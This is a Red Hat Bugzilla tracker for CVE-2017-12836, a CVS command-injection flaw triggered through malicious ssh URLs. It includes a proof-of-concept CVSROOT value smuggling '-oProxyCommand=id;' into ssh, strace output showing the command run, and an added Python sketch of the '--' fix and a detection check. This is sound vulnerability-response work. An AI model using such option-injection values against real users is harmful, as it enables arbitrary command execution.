Bug 1480800 (CVE-2017-12836) - CVE-2017-12836 cvs: Command injection via malicious ssh URLs
Summary: CVE-2017-12836 cvs: Command injection via malicious ssh URLs
Alias: CVE-2017-12836
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
Depends On: 1480801
Blocks: 1480802 1485460
Reported: 2017-08-11 22:22 UTC by Adam Mariš
Modified: 2021-02-17 01:43 UTC (History)

Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
Clone Of:
Last Closed: 2017-08-22 13:35:08 UTC

Attachments
Fix ported to 1.11.23 (1.73 KB, patch)
2017-08-14 09:07 UTC, Petr Pisar

Description Adam Mariš 2017-08-11 22:22:01 UTC
A command injection vulnerability was found in CVS that can be triggered via malicious SSH URLs.

Comment 1 Adam Mariš 2017-08-11 22:22:23 UTC
Created cvs tracking bugs for this issue:

Affects: fedora-all [bug 1480801]

Comment 2 Petr Pisar 2017-08-14 08:25:32 UTC

$ CVS_RSH=/usr/bin/ssh strace -fq -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffc55abc638 /* 38 vars */) = 0
[pid 22658] execve("/usr/bin/ssh", ["/usr/bin/ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x9ce03e55c0 /* 40 vars */) = 0
Pseudo-terminal will not be allocated because stdin is not a terminal.
[pid 22659] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x8dbda2340 /* 40 vars */) = 0
[pid 22659] execve("/usr/bin/id", ["id"], 0x26c07faf80 /* 39 vars */) = 0
[pid 22659] +++ exited with 0 +++
[pid 22658] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22659, si_uid=500, si_status=0, si_utime=0, si_stime=1} ---
ssh_exchange_identification: Connection closed by remote host
[pid 22658] +++ exited with 255 +++
[pid 22657] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22658, si_uid=500, si_status=255, si_utime=0, si_stime=1} ---
[pid 22657] +++ exited with 255 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22657, si_uid=500, si_status=255, si_utime=0, si_stime=0} ---
cvs [checkout aborted]: end of file from server (consult above messages if any)
+++ exited with 1 +++

Debian's fix for cvs-1.12.14 <https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=871810;filename=cvs_1.12.13%2Breal-9%2Bdeb7u1.debdiff;msg=52> adds "--" right before the $CVS_RSH's hostname argument.

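Added illustration (not code from CVS, Debian, or this bug's attachment) of the mitigation described in comment 2: the argument vector CVS hands to $CVS_RSH with and without the "--" separator, plus a policy/detection check for a CVSROOT whose host component would be parsed as an ssh option. The CVSROOT values, the simplified "host:/path" parser and the function names are constructed for this example.

```python
# Constructed CVSROOT values in the legacy "host:/path" form used in comment 2:
# CVS takes everything before the first colon as the host name.
MALICIOUS_ROOT = "-oProxyCommand=id;localhost:/bar"
BENIGN_ROOT = "cvs.example.org:/cvsroot"


def split_cvsroot(cvsroot):
    """Simplified (hypothetical) parser: return (host, path) for 'host:/path'.
    Real CVS also understands ':ext:' and 'user@' prefixes, which are omitted here."""
    host, sep, path = cvsroot.partition(":")
    if not sep:
        raise ValueError("not a remote CVSROOT: %r" % cvsroot)
    return host, path


def build_rsh_argv(cvsroot, rsh="ssh", fixed=True):
    """Argument vector CVS passes to $CVS_RSH to start 'cvs server'.
    fixed=False reproduces the vulnerable layout seen in the strace output:
    a host starting with '-' is parsed by ssh as an option (-oProxyCommand=...).
    fixed=True inserts '--' before the host, as the Debian patch does, so ssh
    stops option parsing and treats the following word as a host name only."""
    host, _ = split_cvsroot(cvsroot)
    argv = [rsh]
    if fixed:
        argv.append("--")
    argv += [host, "cvs server"]
    return argv


def host_looks_like_option(cvsroot):
    """Policy check for an unpatched client: a host component beginning with
    '-' would be consumed by ssh as a command-line option, so reject or flag it."""
    host, _ = split_cvsroot(cvsroot)
    return host.startswith("-")


def ssh_argv_has_injected_option(argv):
    """Detection over an observed execve() argv of the rsh program spawned by CVS.
    CVS itself adds no options, so any '-' argument before a '--' terminator
    is attacker-controlled input that ssh will interpret as an option."""
    for arg in argv[1:]:
        if arg == "--":
            return False
        if arg.startswith("-"):
            return True
    return False
```

With the patched layout, ssh attempts to resolve "-oProxyCommand=id;localhost" as a host name and fails instead of running the ProxyCommand through the shell.
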
Comment 3 Petr Pisar 2017-08-14 09:07:28 UTC
Created attachment 1313002 [details]
Fix ported to 1.11.23

Comment 4 Stefan Cornelius 2017-08-15 09:21:08 UTC
We've seen similar flaws in other source code management tools. However, the other tools allowed attackers to hide their attack in an elegant way. I'm not aware of such a method for CVS. Thus, in order to exploit this issue, an attacker would likely have to trick a user into executing a suspect command line.

Comment 5 Stefan Cornelius 2017-08-22 13:35:15 UTC

Red Hat Product Security has rated this issue as having Moderate security impact. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.
